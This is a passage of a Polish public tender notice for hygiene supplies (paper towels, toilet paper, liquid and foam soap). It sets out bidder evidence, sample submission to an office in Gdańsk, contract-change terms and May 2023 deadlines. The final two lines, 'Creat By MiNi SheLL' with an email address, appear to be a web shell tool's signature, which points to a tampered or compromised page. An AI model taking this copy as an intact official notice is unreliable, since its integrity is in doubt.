przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a) wykaz dostaw (według wzoru stanowiącego załącznik nr 4 do SWZ) zrealizowanych w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączenie dowodów określających czy zostały wykonane należycie, przy czym dowodami są:<br/>- referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane;<br/>- oświadczenie Wykonawcy, jeżeli Wykonawca z przyczyn niezależnych od niego, nie jest w stanie uzyskać tych dokumentów.<br/>2) Jeżeli zachodzą uzasadnione podstawy do uznania, że uprzednio złożone podmiotowe środki dowodowe nie są już aktualne, zamawiający może w każdym czasie wezwać wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia. <br/>3) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych środków.<br/><br/>Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, jakich może żądać Zamawiający od Wykonawcy, o których mowa w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r., składane są zgodnie z przepisami rozporządzenia wydanego na podstawie art. 70 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.W celu potwierdzenia, że oferowane dostawy spełniają wymagania Zamawiającego, Zamawiający żąda złożenia wraz z ofertą:<br/>1) dokumentacji potwierdzającej spełnienie wszystkich wymaganych parametrów techniczno-użytkowych przez oferowane produkty oraz<br/>2) próbek oferowanych produktów<br/>dla wszystkich pozycji formularza asortymentowo-cenowego:<br/>pozycja nr 1 Ręczniki papierowe, białe, składane pojedyncze, dwuwarstwowe, nie wydzielające nieprzyjemnego zapachu po zetknięciu z wodą, niepylące, gramatura 2 x 19g/m² (+/-3%), wymiar 230mm x 250mm (tolerancja wymiarów: +/- 5%), 3200 szt. (20 paczek w opakowaniu) – 1 opakowanie;<br/>pozycja nr 2 Ręczniki w roli Merida Top Automatic Maxi, pasujące do podajników w toaletach Zamawiającego (określonych w załączniku nr 2a do SWZ) lub w przypadku oferowania produktu równoważnego: Ręczniki w roli: białe (od 82% białości), z adapterem do podajników mechanicznych, co najmniej dwuwarstwowe, nie wydzielające nieprzyjemnego zapachu po zetknięciu z wodą, niepylące, gramatura co najmniej od 2 x 17g/m², długość od 240 m, (tolerancja parametrów: +/-5%); zgodnie z załącznikiem nr 2a do SWZ – 1 opakowanie;<br/>pozycja nr 3 Papier toaletowy, 100% celuloza, biały, miękki, dwuwarstwowy, niepylący, gramatura 2 x 16g/m², gofrowany, nie wydzielający nieprzyjemnego zapachu, perforowany co 25 cm, min. 700 listków na rolce (tolerancja parametrów: +/- 5%) – 1 opakowanie;<br/>pozycja nr 4 Mydło w płynie o właściwościach myjących, nie wysusza dłoni, przyjemny delikatny zapach, 1 szt. = 5 kg mydła (lub 1 szt. = 5 l mydła) – 1 opakowanie;<br/>pozycja nr 5 Mydło w pianie Merida Bali Plus, pasujące do dozowników Zamawiającego (określonych w załączniku nr 2a do SWZ) lub w przypadku oferowania produktu równoważnego: Mydło w pianie o właściwościach myjących, wkład jednorazowy z pompką spieniającą, 1 szt. = 700 g lub 1 szt=700 ml, wydajność z jednego wkładu mydła z piany ok. 2 000 porcji - zgodnie z załącznikiem nr 2a do SWZ – 1 opakowanie.<br/>2. Dokumenty, o których mowa w ust. 1 pkt 1), mogą mieć formę specyfikacji technicznych udostępnianych przez producentów/dystrybutorów artykułów higienicznych, karty produktu albo karty katalogowej produktu wystawionej przez producenta/dystrybutora; w przypadku, gdy nie wszystkie wymagane parametry będą wyszczególnione w dokumentacji producenta/dystrybutora, Wykonawca składa dodatkowo oświadczenie Wykonawcy o spełnianiu przez oferowany artykuł danych parametrów. Dokumentacja musi potwierdzać spełnianie przez oferowane produkty wszystkich wymaganych przez Zamawiającego parametrów wyspecyfikowanych w formularzu asortymentowo-cenowym - załącznik nr 2a do SWZ, z wyjątkiem wymagań, które mogą być potwierdzone jedynie organoleptycznie. Dokumentacja musi potwierdzać zatem spełnianie przez oferowane produkty następujących wymagań:<br/>poz. 1: ręczniki papierowe, białe, składane pojedyncze, dwuwarstwowe, gramatura 2 x 19g/m² (+/-3%), wymiar 230mm x 250mm (tolerancja wymiarów +/- 5%), 3200szt (20 paczek w opakowaniu) <br/>poz. 2: Ręczniki w roli: białe (od 82% białości), z adapterem do podajników mechanicznych, co najmniej dwuwarstwowe, gramatura co najmniej od 2 x 17g/m², długość od 240 m, (tolerancja parametrów: +/-5%);<br/>poz. 3 papier toaletowy, 100% celuloza, biały, dwuwarstwowy, gramatura 2 x 16g/m², gofrowany, perforowany co 25 cm, min. 700 listków na rolce (tolerancja parametrów: +/- 5%);<br/>poz. 4 mydło w płynie o właściwościach myjących, 1 szt. = 5 kg mydła (lub 1 szt. = 5 l mydła);<br/>poz. 5 Mydło w pianie o właściwościach myjących, wkład jednorazowy z pompką spieniającą, 1 szt. = 700 g lub 1 szt=700 ml, wydajność z jednego wkładu mydła z piany ok. 2 000 porcji <br/>3. Specyfikacje techniczne lub inne dokumenty ponadto muszą zawierać co najmniej nazwę produktu, nazwę producenta, parametry techniczne dotyczącego danego produktu, pozwalające zweryfikować przez Zamawiającego jego zgodność z postawionymi w załączniku nr 2a do SWZ wymaganiami. <br/><br/>C.D. W SEKCJI XI (POZOSTAŁE INFORMACJE) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1) dokumentacja potwierdzająca spełnienie wszystkich wymaganych parametrów techniczno-użytkowych przez oferowane produkty oraz<br/>2) próbki oferowanych produktów<br/>dla wszystkich pozycji formularza asortymentowo-cenowego:<br/>pozycja nr 1 Ręczniki papierowe, białe, składane pojedyncze, dwuwarstwowe, nie wydzielające nieprzyjemnego zapachu po zetknięciu z wodą, niepylące, gramatura 2 x 19g/m² (+/-3%), wymiar 230mm x 250mm (tolerancja wymiarów: +/- 5%), 3200 szt. (20 paczek w opakowaniu) – 1 opakowanie;<br/><br/>pozycja nr 2 Ręczniki w roli Merida Top Automatic Maxi, pasujące do podajników w toaletach Zamawiającego (określonych w załączniku nr 2a do SWZ) lub w przypadku oferowania produktu równoważnego: Ręczniki w roli: białe (od 82% białości), z adapterem do podajników mechanicznych, co najmniej dwuwarstwowe, nie wydzielające nieprzyjemnego zapachu po zetknięciu z wodą, niepylące, gramatura co najmniej od 2 x 17g/m², długość od 240 m, (tolerancja parametrów: +/-5%); zgodnie z załącznikiem nr 2a do SWZ – 1 opakowanie;<br/><br/>pozycja nr 3 Papier toaletowy, 100% celuloza, biały, miękki, dwuwarstwowy, niepylący, gramatura 2 x 16g/m², gofrowany, nie wydzielający nieprzyjemnego zapachu, perforowany co 25 cm, min. 700 listków na rolce (tolerancja parametrów: +/- 5%) – 1 opakowanie;<br/><br/>pozycja nr 4 Mydło w płynie o właściwościach myjących, nie wysusza dłoni, przyjemny delikatny zapach, 1 szt. = 5 kg mydła (lub 1 szt. = 5 l mydła) – 1 opakowanie;<br/><br/>pozycja nr 5 Mydło w pianie Merida Bali Plus, pasujące do dozowników Zamawiającego (określonych w załączniku nr 2a do SWZ) lub w przypadku oferowania produktu równoważnego: Mydło w pianie o właściwościach myjących, wkład jednorazowy z pompką spieniającą, 1 szt. = 700 g lub 1 szt=700 ml, wydajność z jednego wkładu mydła z piany ok. 2 000 porcji - zgodnie z załącznikiem nr 2a do SWZ – 1 opakowanie.<br/><br/>2. Dokumenty, o których mowa w ust. 1 pkt 1), mogą mieć formę specyfikacji technicznych udostępnianych przez producentów/dystrybutorów artykułów higienicznych, karty produktu albo karty katalogowej produktu wystawionej przez producenta/dystrybutora; w przypadku, gdy nie wszystkie wymagane parametry będą wyszczególnione w dokumentacji producenta/dystrybutora, Wykonawca składa dodatkowo oświadczenie Wykonawcy o spełnianiu przez oferowany artykuł danych parametrów. Dokumentacja musi potwierdzać spełnianie przez oferowane produkty wszystkich wymaganych przez Zamawiającego parametrów wyspecyfikowanych w formularzu asortymentowo-cenowym - załącznik nr 2a do SWZ, z wyjątkiem wymagań, które mogą być potwierdzone jedynie organoleptycznie. Dokumentacja musi potwierdzać zatem spełnianie przez oferowane produkty następujących wymagań:<br/><br/>poz. 1: ręczniki papierowe, białe, składane pojedyncze, dwuwarstwowe, gramatura 2 x 19g/m² (+/-3%), wymiar 230mm x 250mm (tolerancja wymiarów +/- 5%), 3200szt (20 paczek w opakowaniu) <br/><br/>poz. 2: Ręczniki w roli: białe (od 82% białości), z adapterem do podajników mechanicznych, co najmniej dwuwarstwowe, gramatura co najmniej od 2 x 17g/m², długość od 240 m, (tolerancja parametrów: +/-5%);<br/><br/>poz. 3 papier toaletowy, 100% celuloza, biały, dwuwarstwowy, gramatura 2 x 16g/m², gofrowany, perforowany co 25 cm, min. 700 listków na rolce (tolerancja parametrów: +/- 5%);<br/><br/>poz. 4 mydło w płynie o właściwościach myjących, 1 szt. = 5 kg mydła (lub 1 szt. = 5 l mydła);<br/><br/>poz. 5 Mydło w pianie o właściwościach myjących, wkład jednorazowy z pompką spieniającą, 1 szt. = 700 g lub 1 szt=700 ml, wydajność z jednego wkładu mydła z piany ok. 2 000 porcji <br/><br/>3. Specyfikacje techniczne lub inne dokumenty ponadto muszą zawierać co najmniej nazwę produktu, nazwę producenta, parametry techniczne dotyczącego danego produktu, pozwalające zweryfikować przez Zamawiającego jego zgodność z postawionymi w załączniku nr 2a do SWZ wymaganiami. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, warunek udziału w postępowaniu wskazany w Rozdziale VIII ust. 2 winien spełniać w całości co najmniej jeden z Wykonawców,.<br/>2. Wraz z ofertą należy złożyć:<br/>- oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (wzór stanowi załącznik nr 3 do SWZ):<br/>a) Wykonawca dołącza do oferty oświadczenia o niepodleganiu wykluczeniu w zakresie wskazanym w rozdziale VII oraz VII.I SWZ, oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale VIII SWZ. Oświadczenia te stanowią dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale X SWZ.<br/>b) Oświadczenie składają odrębnie:<br/>- każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna). W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>- podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>Wymagana forma:<br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym (Uwaga: podpis osobisty, to nie podpis odręczny).<br/>3. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum, spółka cywilna) wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego należy załączyć do oferty. <br/>4. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców oraz pełnomocnictwa dla osób podpisujących umowę, jeśli ich umocowanie nie wynika z dokumentów załączonych do oferty lub umowy, o której mowa w niniejszym ustępie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie istotne zmiany zawartej umowy będą wymagały pod rygorem nieważności pisemnego aneksu. <br/>2. Zamawiający przewiduje zmiany umowy, o których mowa w art. 455 ustawy Pzp.<br/>Zmiany istotnych postanowień umowy mogą dotyczyć:<br/>1) terminu realizacji umowy;<br/>2) terminu i sposobu realizacji bieżących zamówień.<br/>3. Zmiany, o których mowa w § 6 ust. 2 pkt 1) i 2), mogą nastąpić jedynie w następujących przypadkach:<br/>a) zaistnieją zdarzenia siły wyższej niezależne od stron umowy, które uniemożliwiłyby realizację bieżących zamówień w sposób i w terminie wynikającym z umowy. Pod pojęciem siły wyższej Zamawiający rozumie okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz, którym nie można zapobiec lub przeciwstawić się skutecznie. O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie powiadomić Zamawiającego, określając jednocześnie nowy termin realizacji zamówienia;<br/>b) na wniosek Zamawiającego z przyczyn technicznych lub organizacyjnych, niezależnych od Stron, których nie można było przewidzieć w chwili upływu temrinu składania ofert.<br/>4. Zamawiający dopuszcza zmianę producenta danego produktu wskazanego w ofercie w przypadku wycofania danego produktu wskazanego producenta z rynku lub zakończenia działalności producenta, przy czym zaoferowany produkt nie może charakteryzować się parametrami gorszymi niż wymagane przez Zamawiającego. Cena jednostkowa produktu nie może być wyższa niż w formularzu asortymentowo-cenowym Wykonawcy, stanowiącym załącznik nr 2 do umowy.<br/>5. Wykonawca wnioskujący o zmianę umowy, przedkłada zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pomorskie, próbki Wykonawca przekazuje zgodnie z zapisami Rozdziału V ust. 5 SWZ</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-26 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie przedmiotowego zamówienia mogą się ubiegać wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 108 ust 1 ustawy Pzp oraz na podstawie art. 7 ust. 1 ustawy z 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Zamawiający nie przewiduje wykluczenia Wykonawcy na podstawie art. 109 ust. 1 ustawy Pzp.<br/>Wykonawca złoży w dniu podpisania umowy, aktualne na dzień składania, oświadczenie, mówiące o tym, że nie podlega wykluczeniu w zakresie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/><br/>Zamawiający wskazał w:<br/>- Rozdziale IX SWZ Dokumenty składane razem z ofertą.<br/>- Rozdziale XVI SWZ Opis sposobu przygotowywania oferty.<br/>- Rozdziale XVII SWZ Sposób oraz termin składania ofert.<br/>- Rozdziale XIX SWZ Sposób obliczenia ceny<br/>- Rozdziale XX SWZ Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert<br/>- Rozdziale XXI SWZ Informacje o formalnościach, jakie muszą zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie zamówienia publicznego<br/>- Rozdziale XXII SWZ Projektowane postanowienia umowy.<br/><br/>Wymagany termin wykonania zamówienia – 12 miesięcy od dnia podpisania umowy lub do wyczerpania kwoty określonej w § 4 ust. 1 wzoru umowy stanowiącej załącznik nr 1 do SWZ – w zależności od tego, które z tych zdarzeń wystąpi jako pierwsze.<br/><br/>C.D Z SEKCJI V (KWALIFIKACJA WYKONAWCÓW):<br/><br/>4. Przedmiotowe środki dowodowe Wykonawca składa wraz z ofertą.<br/>5. Z uwagi na niemożliwość przekazania próbek, o których mowa w ust. 1 pkt 2), przy użyciu środków komunikacji elektronicznej zgodnie z dyspozycją art. 65 ust. 1 pkt 4 oraz ust. 2 ustawy, Zamawiający żąda przekazania ww. próbek w terminie wyznaczonym na składanie ofert za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. – Prawo pocztowe, osobiście lub za pośrednictwem posłańca na adres: KANCELARIA OGÓLNA Urzędu Marszałkowskiego Województwa Pomorskiego, ul. Okopowa 21/27, 80-810 Gdańsk, pokój nr 4a (czynna w dni robocze: od poniedziałku do piątku od godz. 7:45 do godz. 15:45) z dopiskiem: OFERTA na Dostawę artykułów higienicznych (nr postępowania DAZ-Z.272.5.2023).<br/>Dostarczone próbki winny być odpowiednio oznakowane, zapakowane oraz zabezpieczone, żeby Zamawiający nie mógł się zapoznać z zawartością przed terminem składania ofert.<br/>Koszty związane z dostawą próbek, o których mowa w ust. 1 pkt 2), ponosi Wykonawca. Złożone próbki stanowią integralną część oferty. Złożone próbki podlegają zwrotowi zgodnie z art. 77 ustawy Pzp, przy czym próbki złożone przez Wykonawcę, którego oferta zostanie wybrana jako najkorzystniejsza, będą stanowiły załącznik do umowy.<br/>6. Zgodnie z treścią art. 107 ust. 2 ustawy Pzp, jeżeli wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie wykonawcę do ich złożenia lub uzupełnienia w wyznaczonym terminie, z zastrzeżeniem ust. 7. <br/>7. Zamawiający nie wzywa wykonawcy do złożenia lub uzupełnienia przedmiotowych środków dowodowych jeżeli, pomimo złożenia przedmiotowego środka dowodowego, oferta Wykonawcy podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <br/>8. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>9. Dotyczy oceny próbek:<br/>Próbki będą służyły potwierdzeniu spełnienia przez oferowane dostawy wymagań określonych przez Zamawiającego.<br/>Ocena będzie polegała na stwierdzeniu czy dany produkt spełnia / nie spełnia wymagań Zamawiającego.<br/>Jeśli w wyniku oceny okaże się, że oferowana próbka nie spełnia jednego lub więcej wymagań Zamawiającego – oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp jako niezgodna z warunkami zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com